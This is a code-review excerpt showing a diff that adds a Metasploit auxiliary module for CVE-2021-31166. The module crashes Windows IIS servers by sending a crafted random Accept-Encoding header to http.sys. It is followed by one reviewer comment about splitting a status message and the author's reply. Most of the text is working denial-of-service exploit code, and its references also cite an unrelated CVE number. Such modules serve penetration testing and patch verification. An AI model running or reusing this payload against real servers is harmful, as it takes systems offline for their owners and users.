modules/auxiliary/dos/windows/http/rb_dos_iis_2021_31166.rb

```diff
@@ -0,0 +1,117 @@
+  include Msf::Auxiliary::Dos
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows IIS HTTP Protocol Stack DOS',
+        'Description' => %q{
+          This module is a proof of concept for CVE-2021-31166 ("HTTP Protocol
+          Stack Remote Code Execution Vulnerability") to exploit a DOS attack,
+          a use-after-free dereference in http.sys patched by Microsoft
+          in May 2021. 
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Max @_mxms',                                   # Vulnerability discovery
+          'Stefan Blair @fzzyhd1',                        # Vulnerability discovery
+          'Axel Souchet 0vercl0k',                        # Exploit in the wild
+          'Maurice LAMBERT <mauricelambert434@gmail.com>' # msf module
+        ],
+        'Platform' => 'win',
+        'References' => [
+          ['CVE', '2022-21907'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2021-31166'],
+          ['URL', 'https://github.com/mauricelambert/CVE-2021-31166'],
+          ['URL', 'https://twitter.com/metr0/status/1392631376592076805'],
+          [
+            'URL', 
+            'https://msrc.microsoft.com/update-gu'\
+            'ide/en-US/vulnerability/CVE-2021-31166'
+          ]
+        ],
+        'DisclosureDate' => '2021-05-11',
+        'Notes' => {
+          'Stability' => [CRASH_OS_RESTARTS],
+          'Reliability' => [IOC_IN_LOGS],
+          'SideEffects' => [SCREEN_EFFECTS]
+        },
+      )
+    )
+
+    register_options(
+      [
+        OptString.new(
+          'TARGETURI', [true, 'The URI of the IIS Server.', '/'],
+        )
+      ]
+    )
+  end
+
+  # This module performs a DOS attack using a simple HTTP request.
+  def run
+    print_status('Connecting to target to make sure its alive...')
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, ''),
+      'method' => 'GET'
+    )
+
+    if res.nil?
+      fail_with(
+        Failure::Unreachable,
+        "#{peer} - Could not connect to the target IIS server - no response"
+      )
+    end
+
+    print_good('Successfully connected to target. Sending payload...')
+
+    payload = "#{rand(1..7).times.map do
+      (0...(rand(2..5))).map do
+        Rex::Text.rand_text_alpha(rand(26))
+      end.join
+    end.join(', ')}, ,"
+
+    payload = {
+      'Accept-Encoding' => payload
+    }
+
+    begin
+        send_request_cgi({
+                           'uri' => normalize_uri(target_uri.path, ''),
+                           'timeout' => 1,
+                           # short timeout -> the server should not respond
+                           'method' => 'GET',
+                           'headers' => payload
+                        })
+    rescue
+    ensure
+        print_good(
+          'Payload was sent to the target server.'\
+          ' Checking that the server is down...'
+        )

```

Comment:
```suggestion
        print_good('Payload was sent to the target server!')
        print_status('Checking that the server is down...')
```

The first message is more of something good that happened. The second message is more of a status update.

Reply:
Will be fixed in an upcoming commit.